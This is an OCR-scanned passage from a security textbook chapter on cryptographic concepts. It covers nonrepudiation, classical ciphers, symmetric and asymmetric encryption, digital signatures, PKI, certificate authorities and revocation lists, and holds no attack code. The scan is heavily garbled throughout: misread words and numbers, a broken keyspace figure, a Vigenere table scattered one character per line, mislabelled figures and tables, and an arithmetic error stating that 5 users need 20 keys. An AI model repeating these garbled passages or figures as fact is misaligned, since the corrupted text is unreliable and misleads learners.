instead of down, the results could be catastrophic, Envision a scenario in which you receive an official but nonconfidential message from a business partner, stating that a customer ivEinls to purchase a product for$ SO, 000. Consider what would h tip pen in this scenario if instead of $50,000 an unethical customer intercepted aiu! ..Itered the message to say$ 5.00, Obviously, if this
happens often, it could cause a company enough losses that they would be out of business
or suffer significant financial loss. You can see that integrity is very important to detecting
alterations to data, but it cannot preserve confidentiality on its own.

Following confidentiality and integrity of information is n on repudiation, or the ability
to have definite proof that a message originated from a specific party. Common examples
of no n repudiation measures are digital certificates and message authentication codes
(MACs), One of the more common uses of no n repudiation is in messaging or e-mail
systems. In an e-mail system, if nonrepudiEition mechanisms are deployed, usually through
digital signatures, it is possible to achieve a state where every official message can be
confirmed as coming from a specific party or sender. In such systems, it w r ou Id be nearly

PART 1 Hacker Techniques and Tools

rC FYI

Over the last few years, technologies Such as BitLocker by Microsoft and True Crypt have
emerged as solutions to the encryption of data on hard drives. With the introduction and
increased accessibility of volume encryption solutions, more organizations are practicing
information safety by encrypting the drives of portable devices as well as removable devices
such as USB flash drives and hard drives.

impossible for an individual to deny sending a message because the digit til signature can
be applied only by the person who has exclusive access to the private key. In enterprise or
high-security environments, a state in which it is impossible for el party to deny sending
a message or initiating an action is desirtible. Also consider another fact of today’s world:
with the Internet allowing communication between parties who may never meet, having
no n repudiation to track an action back to a specific pEirty is a benefit. A common example
of a nonrepudiation measure is the digital signature; additional measures include digital
certificates and MACs.

Up to this point, a lot of attention has been given to the value of encryption for trans-
mission and verification of data in storage. In today’s work environment, increasing
numbers of workers are being provided laptops or other similar mobile devices to work
on the road. These mobile devices are misplaced now and then, and whether the device
is stolen or left behind at an airport security checkpoint, the problem is still the same: the
data on the system is lost. For example, the U.S. Department of Veterans Affairs ( VA) and
the Transportation Security Agency (TSA) have lost laptops containing highly sensitive
information that included personal information of patients, in the former example, and
personal data on registered travelers, in the latter. In both cases and in numerous others,
the impEict could have been lessened if encryption had been used to pro tec 1 l ho hnrd drives
of the laptops. Of course, encryption cannot prevent the loss or theft of a device, but it
can serve as a formidable obstacle for whoever finds it, preventing them from obtaining
sensitive information. Many state, local, and federal agencies have made it mandatory
to encrypt bard drives or laptops in order to lessen the potential imptict of a lost device.
For example, in the state of California, Senate Bill 1386 provides legal protection for
entities t hat accidentally disclose information if the hard drives on those systems can
be shown to have been encrypted.

Within encryption, there are two types of cryptographic mechanisms: symmetric and
asymmetric. The differences between the two mechanisms are significant. Symmetric
cryptography is a mechanism that uses a single shared key for encrypting and decrypting.
The alternative method is asymmetric cryptography, which utilizes two keys, one public
and one private; what is performed with one key can only be reversed with the other.
At this point, it is important to understand that for both symmetric and asymmetric
cryptography, data is encrypted by applying the key to an encryption algorithm.
The algorithm uses the key to perform mathematical substitutions, transpositions,
permutations, or other binary math on plaintext to create ciphertext.

CHAPTER 3 Cryptographic Concepts

Substitution ciphers replace each letter or group of letters with another letter or
group of letters. Probable words or phrases can be guessed by knowing the language in
which the original unencrypted message was written. Substitution ciphers preserve the
order of the plaintext symbols but disguise them. An example of a simple substitution
cipher can be found in many daily newspapers in the puzzle section. Although there
are 15,51X^10,043,3 31,QOQ,QOQ f 09Q,0QQ (15 septillion] possible keys, because the
substitution cipher preserves so much of the original information h the correct key can
often be discovered by an average person over a cup of coffee. This demonstrates that just
because tin encryption scheme has a large number of possible keys, it isn’t necessarily
secure. It is the algorithm that creates security. Don’t be confused by vendors who claim
their solutions are better because they support longer keys, .Size isn’t everything in
cryptography.

Transposition ciphers are different from substitution ciphers in that they reorder
the letters but do not replace them. The cipher is keyed by use of a word or phrase.

Cryptographic History

Humans have been using cryptographic techniques for thousands of years: the
only things that have changed are the complexity and creativity of the techniques.
Cryptography covers the confidentiality, integrity, and nonrepudiation of information,
but at one point cryptography referred solely to protecting the confidentiality of infor-
mation, A quick look hack into history shows some of the ways that encryption was used:

Egyptian hieroglyphics — In some circles, the hieroglyphics painted on the walls
of temples and tombs were a form of encryption because only specific parties
were able to understand them. This was a type of substitution cipher.

Scytale — The Spartans used this technique to send encoded messages to the
front line. It used a rod of fixed diameter with a leather strap that was wrapped
around it. The sender wrote the message lengthwise, and when the strap was
unwound, the letters appeared to be in a meaningless order. By re wrapping on
1 he i’onvot dimncier rod. ihe si nip would line up. mid the message was revealed.
This was a type of transposition cipher.

• Caesar cipher — A type of substitution cipher in which each letter in the

plaintext is replaced by a letter some fixed number of positions down the alphabet
(see Figure 3-1 ).

ABCDEFGHIJKL

FIGURE 3-1

Caesar cipher.

X Y 2 A 6 C D E FH IJ K L

PART 1 Hacker Techniques and Tools

Polyalphabetic cipher (Vigenere cipher) — A substitution cipher that uses multiple
substitution alphabets, as shown in Figure 3-2. Vigenere ciphers consist of simple
poly alphabetic ciphers similar to and derived from Caesar ciphers. Instead of shifting
each character by the same number, as with a Caesar cipher, text or characters
located at different positions are shifted by different numbers.

Enigma — An electromechanical rotor machine used for the encryption and
decryption of classified messages used by Germany during World War II.

JN-25 — An encryption process used by the Japanese during World War II to encrypt
sensitive information. Allied cryptographers broke the JN-2 5 code, and American
Nimitz knew the intended location of the Japanese fleet when it launched its attack
on the island of Midway on June 4. 1942. As a result, the American fleet located
the fleet and won a decisive victory, defeating a superior force with the element of
surprise (and some luck.)

Concealment cipher — The message is present but concealed in some way: as an
example, the hidden message may be the first letter in each sentence or every sixth
word in a sentence.

A

B

C

D

E

F

G

H

1

J

K

L

M

ISI

O

P

Q

R

s

T

U

V

W

X

Y

2

A

A

B

C

D

E

F

G

H

1

J

K

L

M

N

0

P

Q

R

s

T

u

V

w

X

Y

Z

B

B

C

D

E

F

G

H

1

J

K

L

V

N

0

P

0

R

£

T

U

V

W

X

Y

z

A

C

C

D

E

F

G

H

1

J

K

L

M

N

0

P

0

R

S

T

U

V

w

X

Y

Z

A

B

D

D

E

F

G

H

1

J

K

L

M

N

0

P

Q

R

S

T

U

V

W

X

Y

2

A

B

C

E

E

F

G

H

1

J

K

L

M

N

G

P

Q

R

£

T

U

V

W

X

Y

Z

A

B

C

D

F

F

G

H

1

J

K

L

M

N

0

P

Q

R

£

T

U

V

w

X

Y

2

A

B

C

D

E

G

G

M

1

J

K

L

M

N

0

P

Q

R

S

T

U

V

w

X

Y

2

A

B

C

D

E

F

H

■1

1

J

K

L

M

N

0

P

0

R

S

U

V

w

X

Y

z

A

B

C

D

E

F

G

1

1

J

K

L

M

N

0

P

0

R

£

T

U

V

w

X

Y

2

A

B

C

D

E

F

G

H

J

J

K

L

M

N

0

P

0

R

S

T

U

V

W

X

Y

z

A

B

C

D

E

F

G

H

1

K

K

L

M

N

0

P

Q

R

S

T

U

V

w

X

Y

z

A

B

C

D

E

F

G

H

1

J

L

L

M

N

0

P

Q

R

£

T

U

V

W

X

Y

Z

A

B

C

D

E

F

G

H

1

J

K

M

M

N

O

P

Q

R

S

T

U

V

w

X

Y

Z

A

B

C

D

L

F

G

■1

1

J

K

L

N

N

0

P

Q

Ft

£

T

U

V

W

X

Y

z

A

B

C

D

E

F

G

H

1

J

K

L

M

0

0

P

Q

S

T

U

V

W

X

Y

2

A

B

C

J

E

F

G

H

1

J

K

L

V

N

P

P

Q

R

S

T

U

V

W

X

Y

2

A

B

C

D

E

F

G

H

1

J

K

L

M

N

0

Q

0

R

S

T

U

V

W

X

Y

z

A

B

C

D

E

F

G

H

1

J

K

L

M

N

O

P

R

R

S

T

U

V

w

X

Y

2

A

B

C

D

E

F

G

H

1

J

K

L

M

N

O

P

Q

S

£

T

U

V

W

X

Y

2

A

B

C

D

E

F

G

H

1

J

K

L

M

N

0

P

G

R

T

T

U

V

w

X

Y

Z

A

B

C

D

E

F

G

H

1

J

K

L

M

N

0

P

0

R

S

U

U

V

w

X

Y

Z

A

B

C

‘J

E

F

G

H

1

J

K

L

V

N

0

P

0

R

S

[

V

V

w

X

Y

Z

A

B

C

D

E

F

G

H

1

J

K

L

:V

N

0

P

0

R

S

T

U

W

W

X

Y

2

A

B

::

D

E

F

G

H

1

J

K

L

M

N

0

P

0

R

S

T

U

V

X

X

Y

2

A

B

C

D

E

F

G

H

1

J

K

L

M

N

O

F

0

R

£

T

u

V

w

Y

Y

2

A

B

c

D

E

F

G

H

1

J

K

L

M

N

O

p

Q

R

£

T

u

W

X

Z

2

A

B

C

D

E

F

G

il

1

J

K

L

M

N

0

P

0

R

S

T

U

V

w

X

Y

FIGURE 11

Polyalphabetic cipher.

CHAPTER 3 Cryptographic Concepts

Cryptography is also seen in places where it is not normally expected, s uch as games.
Cryptography has shown up in children’s puzzles., on the back erf cereal boxes, and in video
games. And in one of the more creative uses of cryptography, Valve software in early 2010
announced the sequel to the popular game Portal by placing a series of cryptographic puzzles
in the original game tnat had to be cracked in order to obtain news on the sequel. Other
examples include cryptographic puzzles and hints in TV shows such as Lost that can be solved
to get additional clues about the show. Although such examples aren’t used to protect sensitive
information, they illustrate other ways the techniques are used.

• One-time pad — Uses a large nonrepeating key. Each cipher key character is used
exactly once and then destroyed. Keys must be completely random, or nearly so,
and must be as long as the message. One-time pads are used for extremely sensitive
communications (for example, diplomatic cables). Prior to use, keys must be
distributed to each party in a manner that cannot be intercepted (for example,

in the ‘”diplomatic pouch” that cannot he opened or inspected by another nation.)
Rending the key using the same mechanism as the message would compromise
the cipher.

Any organization can use cryptography to protect the conlidentiality and integrity of
information. Some that have found cryptography useful include corporations, govern-
ments, individuals, and criminals — each has used cryptography to preserve security
in some way

The capabilities of cryptography lie within four areas:

• Privacy — Deals with enforcement of one of the pillars of information security:
i onEidentiality

• Authenticity — The ability to ensure that a piece of data can be verified as being
valid and can be trusted.
• Integrity — Allows for the detection of alterations in a given unit of information
through the process known as hashing.

• N on repudiation — The ability to have positive proof that a message or action
originated with a certain party.

It Is important to separate the ability of encryption to provide confidentiality and integrity.
Confidentiality maintains the secrecy of data, but does not provide a way of detecting data
alteration, Integrity of data is provided via hashing functions that allow for the detection
of alterations of information, but does not provide confidentiality because hashing does
not encrypt data . If both integrity and confidentiality are desired, it is possible to combine
techniques to achieve both goals,

PART 1 Hacker Techniques and Tools

Symmetric Encryption

Symmetric encryption uses the same key to encrypt and to decrypt information. When
encrypting a given piece of in form tit ion, there arc two different mechanisms an algorithm
etui use: stream cipher or block cipher. Stream ciphers operate one hit at a time by
nppivbiLi ei pseudorandom key to the plaintext. In a block cipher, data is divided into
fixed lengths, or blocks (usually 64 bits): all the bits are then acted upon by the cipher
to produce an output, The output size of each of these ciphers is the same as the input
size, which means they can be used for real-time applications such as voice and video.
A large number of encryption algorithms are block ciphers.
Here are some basic concepts to understand:

■ Unencrypted data is known as cleartexl or plaintext, Don’t get confused by the
four letters at the end (text); clear text and plaintext both refer to information that
is still in a format that is understandable to a person or an application (for example,
it could be raw video).

• Encrypted data is known as cipher text and cannot be understood by any party
that does not have the correct encryption algorithm and the proper key.
• Keys are used to determine the specific settings to be used for encryption. The key
can be thought of as a combination of bits that determines the settings to be used to
encrypt or decrypt. Keys can be generated by hashing some keyboard inputs (weak,
which could be duplicated through guessing or brute force) or by a pseudorandom
number generator (stronger, which is much more difficult to duplicate). There is

• a concept called a “weak key, M which means that it causes the algorithm to “”leak”
information from plaintext to ciphertext. Often these are keys, such as all zeros or all
ones, or some repetiting pattern. Algorithms that use longer keys will have a larger
‘”keys pace” — the universe of all possible keys. The larger the key space, the more
computation required by an adversary to try all of them. Longer keys combined
with a strong algorithm represent better security.

• The quality of its algorithm is of vital importance to the effectiveness of the
encryption process. The algorithm del ermines how encryption will be performed
and, along with a key. the effectiveness of the cryptosystem. Remember that an
algorithm and the length of a key plus I he qualify of the algorithm, determine
how secure a system is.

Symmetric encryption is in widespread usage in various applications and services as
well as techniques such as data transmission and storage. Symmetric, like any other
encryption technique, relies on the secrecy of and strength of the key. If the key gener-
ation process is weak the entire encryption prikvs> will be weak.

CHAPTER 3 Cryptographic Concepts

59

FYI_j— |

As technology improves, longer key lengths are generally implemented. In the 1970s and early
1980s, a 56-bit Data Encryption Standard IDES) key was considered to be adequate to resist
a brute-force attack for up to 90 years. Today, specially built powerful computers can brute force

Elliptic curve cryptography, due to the nature of the computations involved, has intrinsically
shorter keys (for example, a 256-bit EC key has as much cryptographic strength as a 3,072-bit
RSA key, when you consider the algorithm as part of the “strength” {which you must).

In symmetric encryption, one key is used for both the encryption and decryption
processes; as such, the key must be distributed to all the parties who will need to perform
encryption or decryption of data in the system. Due to this arrangement, it is necessary
for a process In be in place to distribute the keys to all parties involved because keys cannot
be simply transmitted in the same way as the encrypted data lest it be intercepted by
unauthorized parties. In symmetric encryption, additional steps are needed to protect
the key because the interception of a key will allow unrestricted access to the secured
information, To prevent I he unauthorized disclosure of a key to parties not authorized
to possess it, you can use what is known as out-of-band communications. Using this
technique it is possible to distribute a key in a manner different from the data, thereby
preventing someone from intercepting the key with the data. This would be akin to
sending an e-mail to someone in an encrypted format and then calling them on the phone
and giving them the key. If a large key and a strong algorithm are used with symmetric
encryption, the strength of the system increases dramatically, but this strength does
not amount to much if the key is accessible to unauthorized parties. An example of
symmetric encryption is shown in Figure 3.3.

Plaintext

This is

Encryption

Ciphertext

Wo!@2A
!%G31
1523%$FIGURE 3-1 Symmetric encryption. Ciphertext Plaintext Wol@2A !%G31 1523%$

Decryption

again

60 PART 1 Hacker Techniques and Tools

Another importEint characteristic that makes symmetric encryption preferable to
asymmetric encryption is that it is inherently faster due to the nature of the computa-
tions performed. When processing, a large amount of data, this performance advantage
becomes significant, To gel the best of both worlds, modern cryptography usually
utilizes asymmetric encryption to establish the initial “handshake,” passing asymmetric
encryption key from one party to another. That key is then used by both parties to encrypt
and decrypt the bulk of the in form at ion.

The most widely recognized symmetric-key algorithm is the DES. Other symmetric
algorithms include the following:

• 3 DES (or Triple DES) — An extended, more-secure version of DES that performs
DES three times.

Advanced Encryption Standard (AES) — The replacement algorithm for DES that
is more resistant to brute-force attack. AILS is designed to make it mathematically
impossible to break using current technology

■ Blowfish — A highly efficient block cipher that can have a key length up to 448 bits,

• International Data Encryption Algorithm (IDEA) — Uses 64-bit input and output
data blocks and features a 128-bit key

• RC4 — A stream cipher designed by Ron Rivest that is used by WE P.

RC5 — A fast block cipher designed by Ron Rivest that can use a large key size.

RC6 — A cipher derived from RC5.

■ Skipjack — A symmetric algorithm of 80 -bit lengths developed
by the National Security Agency (NSAL

^ MOTE

The security of symmetric
encryption is completely
dependent on how well the
key Es protected. Managing
the cryptographic keys is
of the utmost importance.

The algorithms listed here are only a smalt number of the symmetric
algorithms available, but they represent the ones most commonly
used in encryption systems. While each is a little different, they
do share certain characteristics, such as the common single key
to encrypt and decrypt and the performance benefits associated
with symmetric systems.

r- ( fy’ f

Skipjack was developed by the NSA in 1993 to be adopted by telecom companies and
embedded in communication devices via the Clipper Chip. With a court order (required because
keys were escrowed), NSA would have had the ability to listen in on specific conversations.
When the program was made public, popular resentment toward “Big Brother” created suffi-
cient political pressure to doom the project by 1996. Oddly enough, ill-informed people seemed
to prefer the arrangement where anyone could intercept their unencrypted communications
rather than permit the possibility that only the federal government might be able to intercept
their encrypted communications, which would have been safe from any other eavesdropper.

CHAPTER 3 Cryptographic Concepts

61

To ensure confidentiality among multiple users of a symmetric encryption system,
each pair of users must share a unique key. This means the number of key pairs increases
rapidly, and for n users, is represented by the sum of all of the numbers from 1 to (n— 1).
This is expressed as follows:

Cn-1)

gi = (n){n-l)/ 2
i = 1

A system of 5 users would need 20 unique keys, and a system of ]()() users would
need 4,9 SG unique keys. As the number of users increases, so does I he problem of key
management. With so many keys in use, the manager of keys must define and establish a
key management program. Key management is the process of carefully considering every-
thing that possibly could happen to a key, from securing it on the local device to securing
it on a remole device and providing protection against corruption and loss. The following
responsibilities all fall under key management:

Keys should be stored and transmitted by secure means to avoid interception
by an unauthorized third party

• Keys should be generated by a pseudorandom process (rather
than letting users pick their own keys) to prevent guessing the key.

■ The key s lifetime should correspond with the sensitivity of the
data it is protecting and the authorization to use them needs to
expire in a timely fashion.

• Keys should be properly destroyed when the process for which
they were used in has lapsed, The destruction of keys will be
defined in the key management policies of the organization
and should be done so with respect to those policies.

Asymmetric Encryption

The other type of encryption in use is asymmetric encryption. It was
originally conceived to address some of the problems in symmetric
encryption. Specifically, asymmetric encryption addresses the problems
of key distribution, generation and non repudiation.

Asymmetric-key cryptography is also called public key cryptography, which is the
name by which it is commonly known. Asymmetric encryption was derived from group
theory, which allows for pairs of keys to be generated such that an operation performed
with one key can be reversed only with the other. The key pair generated by asymmetric
encryption systems is commonly known as public and private keys. By design, everyone
generally has access to the public key and can use it at any time to validate or reverse
operations performed by the private key. By extension, any key that has its access
restricted to a small number or only one individual becomes a private key he cause
not everyone can use it. Anyone who has access to Lhe public key can encrypt data,

NOTE

The more tbe key is used
and the more sensitive the
data, the more important
ft may become to have a

Dr. Whitfield Diffieand
Dr. Martin E. Hellman
published the first public
key exchange protocol
in 1976.

n

62

PART 1 Hacker Techniques and Tools

FIGURE 3-4

Asymmetric encryption.

Plaintext

This is

Ciphertext

Encryption

WqE@2A
!%G31
!523%S

Wo!@2A
l%G31
1523%$Decryption Readable again Ciphertext Plaintext but only the holder of the corresponding private key can decrypt it. Conversely, if the holder of the private key encrypts something with the private key. anyone with access to the public key can decrypt. Figure 3-4 provides an overview of the a symmetric process. Without getting into too much mathematics, let’s note that asymmetric key cryptog- raphy relies on what is called MP- hard problems. Roughly speaking, a math problem is considered to be NP-hard if it cannot be solved in polynomial lime: that is, something similar to x 2 or x\ An NP-hard problem might require 2 X time to solve. So comparing these three types of times to solve a problem, x 2 , x\ and 2 E , let’s see what happens when we increase the size of x, Table 5-1 show r s the results. table 3-1 Comparison of polynomial-time and NP-hard problems. X X 2 X 3 2* 1 1 1 2 10 100 1,000 1,024 32 1,024 32,768 4,294,967,296 64 4,096 262,144 13,446,744,073,709,551,616 100 10,000 1,000,000 1,267,650,600,228,229,401,496,703,205,376 CHAPTER 3 Cryptographic Concepts Asymmetric cryptography relies an types of problems that are re hi lively easy to solve one way but are extremely difficult to solve the other way. I lere’s v\ simple example: Without using a calculator, what is 2 3 3 limes 347? Pretty simple: K() t S51. OK, if you didn’t know those two numbers, and someone asked you Lo figure out the prime factors of 8U,8 51 , how would you do it? You’d try dividing by 2. 3, 5, 7* 11 , 13, and so on until you got up to 233. That takes a while — a lot longer than simply multiplying two numbers. This is an example of what is called a one-way problem. It’s not really one-way — you can go backward — it just takes a Jot more work to do so. With asymmetric encryption, the information is encrypted by the sender with the receiver’s public key The information is decrypted by the receiver with the private key Examples of asymmetric algorithms include the following: ■ Diffie-Hellman — A process used to establish and exchange asymmetric keys over an insecure medium. The “hard” problem It uses is modular logarithms. • El Gamal — A hybrid algorithm that uses asymmetric keys to encrypt the symmetric key. which is used to encrypt the rest of a message. Based on Diffie-Hellman, it also relies on discrete logarithms. • RSA (Rivest-Shamir-Adelman) — Patented in 19 77. RSA symbolically released its patent to the public about 48 hours before it expired in 2002. RSA is still used in various applications and processes such as e-commerce and companibie applications. In general, this algorithm is not used as much as it once was due to performance and overhead, and as a result it has been replaced with newer algorithms. RSA is based on the difficult problem of factoring two large primes (similar to the previous calculation exerciser • Elliptic curve cryptography (ECC) — This is based on the difficulty of solving the elliptic curve discrete logarithm problem (which we won’t even think of getting into here). Because the algorithm is so computationally intensive, shorter key lengths offer better security relative to other algorithms using the same key length. These shorter keys require less power and memory to operate, w T hich means ECC may be used more often on mobile devices or devices with lesser processor power or battery pow r er. The strength of asymmetric encryption is that it addresses the most serious problem of symmetric encryption: key distribution. Although symmetric encryption uses the same key to encrypt and decrypt, asymmetric uses two related but different keys that can reverse whatever operation the other performs. Due to the unique properties that are a characteristic of asymmetric encryption, simply having one key does not give insight into the other. A public key can be placed in a location that is accessible by anyone who may need to send information to the holder that has the corresponding private key. Someone can safely distribute the public key and not worry about compromising security in any way. This public key can be used by anyone needing to send a message to the 64 PART 1 Hacker Techniques and Tools owner of the public key. Because once the public key is used to encrypt a message, it cannot be used to decrypt that message. Thus, there is no fear of unauthorized disclosure. When a message is delivered, it is decrypted with the private key Users must keep their private keys protected at alt times. If com prom ised> they could be used to forge messages and decrypt previous messages that should remain private. Similarly, directories that house public keys must resist tampering or compromise. Otherwise, an attacker could upload a bogus public key to the public repository, and messages intended for the real recipient could be read only by the attacker. The highest disadvantage of asymmetric crypto logy is that the algorithms take much longer to process, and thus it suffers from performance issues in comparison with symmetric encryption. These performance shortcomings become very apparent with bulk data, which is why asymmetric keys are often used to just to exchange the symmetric key used to encrypt the rest of the message stream. To better understand the difference between symmetric and asymmetric encryption, take a moment to review Table 1-2. NOTE Asymmetric encryption can employ functions known as trapdoor functions, which are functions that are easy to compute in one direction, but tough to do so in the other. table 3-2 Comparison of asymmetric and symmetric encryption. FEATURE SYMMETRIC ENCRYPTION ASYMMETRIC ENCRYPTION 1. Number of keys One key shared by two or more parties Pairs of keys 1. Types of keys used Key is secret One key is private and one key is public 1. Loss of keys can result in Disclosure and modification Disclosure and modification for private keys and modification for public keys 1. Relative speeds Faster Jilowi^r^^^^^^^^^^^^^^^^H 1. Performance Algorithms are more efficient Algorithms are less efficient 1. Key length Fixed key length Fixed or variable key lengths (algorithm-dependent) 1. Application Ideal for encrypting files and communication channels Ideal for encrypting and distributing keys and for providing authentication CHAPTER 3 Cryptographic Concepts What should be protected: the algorithm or the key? Auguste Kerckhoffs published a paper in 1883, stating several principles about stronger and better encryption; among these principles was the idea that the only secrecy involved with a cryptography system should be the key. The idea was that the algorithm should be publicly known while the key kept secret This debate is still argued today, with some believing that all algorithms should be publicly available and scrutinized by experts in Order to make the algorithm better. Others in the field argue that the algorithm should be kept secret as well to provide security in layers because an attacker would have to uncover the key and the algorithm to attempt an attack. Digital Signatures Another capability provided by cryptographic technologies is that of digital signatures. Digital signatures arc a combination of public key cryptography and hashing. First, to understand what a digital signature is designed to provide and what the cryptographic techniques are meant to do, consider what a traditional signature is designed to provide. In a traditional signature on a document, two features are offered. First, the signature of an individual is unique to that individual and therefore proofofthat person’s identity. The other ability offered with traditional signatures is implied by the document il is written on; when a person signs a document, he or she is providing a means of proving which document he or she agreed to. This process can be considered an exercise in nonrepudiEition because the signature is unique to that person, and integrity because the signature is applied only to the document that person agreed to. Digital signatures are a com hi nation of public key cryptography and hashing, To create a digital signature, two steps take place that result in the actual signature that is sent with data. First, the message or in formal ion to be sent is passed through a hashing algorithm that creates a hash to verify the integrity of the message. Second, the hash is passed through the encryption process using the sender’s private key as the key in the encryption process. This signature is then sent, along with the original unencrypted message, to a recipient who can reverse the process. When the message is received with the signature, the receiver will first validate the identity of the sender and then retrieve the public key to decrypt the signature. Once the message is decrypted, the hash is revealed: at this point the receiver will run the same hashing algorithm to generate a hash of the message. Then l he hashes, both l he original and the one newly (.Tea led. sinus Id match: ii’ lin-v do not, the message has been altered; if they do, the message has been proven to come from a specific party and has been unaltered. Figure 3-5 shows an example of a digital signature in use. PART 1 Hacker Techniques and Tools Signing Verification 1O0011O1O1O1 Hash Function Hash Data Certificate Encrypt hash using signer’s private key rrO 10001 1010101 Signature Attach to Data Digitally Signed Data FIGURE 3-5 The use of a digital signature, Digitalty Signed m| Data 100011010101 Data Hash Function Decrypt using signer’s public key 100011010101 Hash 10001 1010101 Hash If the hashes are equal, the signature is valid. Purpose of Public Key Infrastructure One of the more commonly used mechanisms Lhat involve cryptography is that of public key infrastructure (PKI]l PKI provides a mechanism through which two parties can establish a trusted relationship even if the parties have no prior knowledge of one another. For an example of PKI in use, consider e- commerce applications that are used to purchase products or services online. Examine the environment that e-com merce functions in and contrast it with how things work in the real worJd. In the real world, you can walk into a store, see who it is you are dealing with face to face, and get a sense of whether you should trust the business or not. In cyber space h a trust relationship is much harder to establish because you cannot just walk into a real- world store, either because said store is not nearby or a brick and mortar storefront does not exist. In such situations, you cannot see whom you are dealing with and hcive to decide whether to trust the business or not. CHAPTER 3 Cryptographic Concepts PKl addresses these concerns and bring trust, integrity, and security to electronic transac- tions. The FKl framework exists to manage, create, store, and distribute keys and digital certificates safely and securely, The components of this framework include the following: • Certificate Authority (CA) — The entity responsible for enrollment, creation , management, validation, and revocation of digital certificates • Registration Authority (RA) — An entity responsible for accepting information about a party wishing to obtain a certificate; RAs generally do not issue certificates or manage certificates in any way In some situations, entities known as Local [Registration Authorities (LRAs) are delegated the ability to issue certificates by a CA. • Certificate Revocation List {CRL) — A location in which certificates that have been revoked prior to their assigned expiration are published • Digital certificates — Pieces of information, much like a driver’s license in the real world, that are used to positively prove the identity of a person, party, computer, or service • Certificate Distribution System — A combination of software, hardware, services, and procedures used to distribute cert It leal es The issue of key management becomes much larger as the pool of users interacting with the system grows. Consider the fact that in small groups it is possible for users to exchange public keys based on a previously established level of trust. At the size of an enterprise or the Internet, knowing one another ahead of time and basing key exchange on this is not feasible. PKI provides a solution to this problem because it provides a mechanism through which keys can be generated and bound to a digital certificate that can be viewed and validated by all parties. To ensure trust. PKI also addresses storing, managing, distrib- uting, and maintaining the keys securely. For any PKI system to be used, a level of support for the binding between a key and its owner requires that both a public key and a private key be created and maintained for each user. Public keys must be distributed or stored in a secure manner that prevents the keys from being tampered with or altered hi any way. Another important issue is key recovery. In any complex environment like PKL the possibility for key loss or for a key to be compromised exists, so the system must have safeguards in place for this. Consider a scenario in which an employee or other individual leaves an organization on less than ideal terms such as being terminated for cause. In such situations, there exists a real possibility that retrieving the key from the individual may be impossible or unlikely, In these situations, there must be safeguards to retrieve said key or provide backup mechanisms in the event that vital data must be decrypted, for example. One option in this situation is known as key escrow, which can be used as a way to delegate responsibility of keys to a trusted third party. In such mechanisms, the third party holding the keys securely is known as a key escrow agent. In this situation, keys are kept sate by the third party and access to the keys is granted only if certain predefined guidelines have been met. 68 PART 1 Hacker Techniques and Tools M of N M of N is another way to ksep keys secure while ensuring access. In M of N, a key is broken into pieces, and the pieces are distributed in different combinations to trusted parties. If the key is needed, some (but not all) of the holders must be present to be able to reassemble the key. For example, if a key is broken into three parts, two of the three individuals are needed to retrieve the key because every individual has only two parts and needs one other person to get the whole key. M of N is particularly useful in situations where a key not only needs to be easily recoverable but also in situations where the key is used in particularly sensitive operations. M of N prevents any one person from retrieving a key alone, so the individual must work (or collude) with another individual to help retrieve the key. Finally, determine how long a key will be valid and set a key lifetime. The lifetime for a key can be any length that is determined to be useful or practical in a given situation. Keys used more frequently tend to be assigned shorter life spans, whereas keys that are used less frequently tend lo have much longer life spans. Keys that are used more frequently tend to have shorter lifetimes simply because increased usage means more of it has been used with more encryption operations, so there are many more pieces of information an attacker can analyze to deLermine the key. Another common factor in determining key lifetime is that of usage, specifically what the key will be used for in practice. For example, an organization m ay assign keys of different lifetimes to temporary versus permanent employees. Suppose that some information may be valuable only for a short period of time* while other data may need protection for longer periods of time. For example, if the piece of information being encrypted will be essentially useless in a week’s time, a key lifetime longer than a week may be pointless. Also consider what happens at the end of a key’s lifetime. Keys cannot simply be erased from media or deleted in some other way: they must be carefully destroyed using the proper technique suitable for the environment. Even more important to the issue of key lifetime and destruction is the fact that keys might not simply be retired, but they may have been lost or compro- mised > which can be more serious issues in some cases. • { ™ J Key zeroization is a technique used during the key destruction process. This process is the activity of clearing all the recorded data about the key and leaving only zeros in its place. The process is designed to prevent the recovery of keys from media or a system using file recovery or forensics techniques. Mote that any time keys are distributed on a medium that can be copied, there may be no way to ensure that every copy has been destroyed. I CHAPTER 3 Cryptographic Concepts 69 The Role of Certificate Authorities (CAs) Certificate authorities perform several import Eint functions that make them important PKIs. The main function or capability of the CA is to generate key pairs and bind a user’s identity to the public key. The identity that the public key is hound to by the CA is the digital certificate that validates the holder of the public key. lice a use the CA is validating the identity of users and creating items such as key pairs that are in turn used to perform sensitive operations, it is important that the CA he trusted. The CA must be a trusted entity in much the same way as the DMV is trusted with driver’s licenses and the State Department is trusted with passports. The CA and the PK1 systems function on a system of trust, and if this is in question, serious problems can result. The CA issues certificates to users and other certification authorities or services, CAs issue certification revocation lists fCRLs) that are periodically updated and post certificates and CRLs to a repository. CAs include the types shown here: Root CA — The CA that initiates all trust paths. The root CA is also the principal CA for that domain. The root CA can be thought of as the top of a pyramid if that pyramid represents the CA hierarchy. Peer CA — Has a self-signed certificate that is distributed to its certificate holders and used by them to initiate certification paths. Subordinate CA — A certification authority in a hierarchical domain that does not begin trust paths. Trust initiates from some root CA, In some deployments, it is referred to as a child CA. Registration Authority (RA) The R A is an entity positioned between the client and the CA that is used to support or offload work from a CA. Although the RA cannot generate a certificate it can accept requests, verify a person’s identity, and passes along the inform tition to the CA that would perform the actual certificate generation, RAs are usually located at the same location as the subscribers for which they perform authentication. Certificate Revocation List (CRL) A CRL is a list of certificates that have been revoked. Typically, a certificate is added to a CRL hecause it can no longer be trusted. Whether there is a loss of a key or an employee has left the company is unimportant — if trust is lost,, onto the CRL it goes, It is for these reasons that the CRL must be maintained. CRLs also provide important mechanisms for documenting historical revocation information, The CRL is maintained by the CA, and the CA signs the list to maintain its accuracy. Whenever problems are reported with digital certificates and they are considered invalid, and the CA would have their serial numbers added to the CRL. Anyone requesting a digital certificate can check the CRL to verify the certificate’s validity. NOTE Because RAs do not have a database or generate certificates or keys, they do not have the same security requirements as a CA, In most cases, an RA will have lesser security than a CA, However in those cases such as with LRAs, higher security is a necessity as these unique versions do issue certificates as delegated by a CA. 70 PART 1 Hacker Techniques and Tools ^MOTE The most current version of X.509 is version 3. J Digital Certificates Digital certificates provide an important form of identification on the Internet and in other areas. Digital certificates play a key role in digital signatures, encryption, and e-commercc, among others. One of the primary roles that the digital certificate serves is ensuring the integrity of the public key and making sure that the key remains unchanged and in a valid form. The digital certificate also validates that the public key belongs to the specified owner and that all associated information is true and correct. The infor- mation needed to accomplish these goals is determined by the CA and by the policies in place within the environment. Some information is mandatory in a certificate; other data is option til and up to Ihe admin- istrators of the structure. To ensure 